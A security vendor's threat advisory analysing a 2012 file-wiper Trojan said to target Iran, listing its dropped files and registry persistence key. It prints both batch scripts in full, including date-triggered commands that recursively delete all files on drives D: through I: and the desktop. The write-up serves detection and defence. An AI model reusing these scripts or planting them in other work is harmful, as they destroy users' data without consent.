New File Wiper Trojan targeting Iran (Dec 21, 2012)


The Dell Sonicwall Threats research team received reports of a new file wiper Trojan. The purpose of this Trojan is quite simple: Delete files on a range of specified drives on specified dates. This can be on remote storage devices or local external storage as long as they are mounted under certain drive letters. It has been widely reported that the attack is targeted and the Trojan is aimed at affecting Iranian computers.

Infection cycle:

The Trojan adds the following files to the filesystem. These files are contained in the rar compressed portion of the original binary [Detected as GAV: DelFiles.NBV (Trojan)]:

  • %SYSTEM32%jucheck.exe [Detected as GAV: Batchwiper.A (Trojan)]
  • %SYSTEM32%juboot.exe [Detected as GAV: Batchwiper.A (Trojan)]
  • %SYSTEM32%SLEEP.EXE [non-malicious sleep utility]
  • %USERPROFILE%Local SettingsTempE.tmpjuboot.bat [dropped by juboot.exe]
  • %USERPROFILE%Local SettingsTemp11.tmpjucheck.bat [dropped by jucheck.exe]

The Trojan adds the following key to the windows registry to enable startup after reboot:

  • HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun jucheck.exe “%SYSTEM32%jucheck.exe”

The file juboot.bat contains the following data that is used to initiate infection:

      @echo off & setlocal
      sleep for 2
      REG add HKCUSoftwareMicrosoftWindowsCurrentVersionRun /v jucheck.exe /t REG_SZ /d "%systemroot%system32jucheck.exe" /f
      start "" /D"%systemroot%system32" "jucheck.exe"

The file jucheck.bat contains the following data which causes all files on the desktop and in drives D: through I: to be wiped on the specified dates:

      @echo off & setlocal
      sleep for 2
      del "%systemroot%system32juboot.exe" /q /s /f
      del "%userprofile%Start MenuProgramsStartupGrooveMonitor.exe" /q /s /f
      if "%date%"=="Mon 12/10/2012" goto yes
      if "%date%"=="Tue 12/11/2012" goto yes
      if "%date%"=="Wed 12/12/2012" goto yes
      if "%date%"=="Mon 01/21/2013" goto yes
      if "%date%"=="Tue 01/22/2013" goto yes
      if "%date%"=="Wed 01/23/2013" goto yes
      if "%date%"=="Mon 05/06/2013" goto yes
      if "%date%"=="Tue 05/07/2013" goto yes
      if "%date%"=="Wed 05/08/2013" goto yes
      if "%date%"=="Mon 07/22/2013" goto yes
      if "%date%"=="Tue 07/23/2013" goto yes
      if "%date%"=="Wed 07/24/2013" goto yes
      if "%date%"=="Mon 11/11/2013" goto yes
      if "%date%"=="Tue 11/12/2013" goto yes
      if "%date%"=="Wed 11/13/2013" goto yes
      if "%date%"=="Mon 02/03/2014" goto yes
      if "%date%"=="Tue 02/04/2014" goto yes
      if "%date%"=="Wed 02/05/2014" goto yes
      if "%date%"=="Mon 05/05/2014" goto yes
      if "%date%"=="Tue 05/06/2014" goto yes
      if "%date%"=="Wed 05/07/2014" goto yes
      if "%date%"=="Mon 08/11/2014" goto yes
      if "%date%"=="Tue 08/12/2014" goto yes
      if "%date%"=="Wed 08/13/2014" goto yes
      if "%date%"=="Mon 02/02/2015" goto yes
      if "%date%"=="Tue 02/03/2015" goto yes
      if "%date%"=="Wed 02/04/2015" goto yes
      goto no
      sleep for 3000
      IF EXIST d: del "d:*.*" /q /s /f
      IF EXIST d: Chkdsk d:
      IF EXIST e: del "e:*.*" /q /s /f
      IF EXIST e: Chkdsk e:
      IF EXIST f: del "f:*.*" /q /s /f
      IF EXIST f: Chkdsk f:
      IF EXIST g: del "g:*.*" /q /s /f
      IF EXIST g: Chkdsk g:
      IF EXIST h: del "h:*.*" /q /s /f
      IF EXIST h: Chkdsk h:
      IF EXIST i: del "i:*.*" /q /s /f
      IF EXIST i: Chkdsk i:
      del "%userprofile%Desktop*.*" /q /s /f
      \start calc

The .bat files are deleted after execution.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: DelFiles.NBV (Trojan)
  • GAV: Batchwiper.A (Trojan)
Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.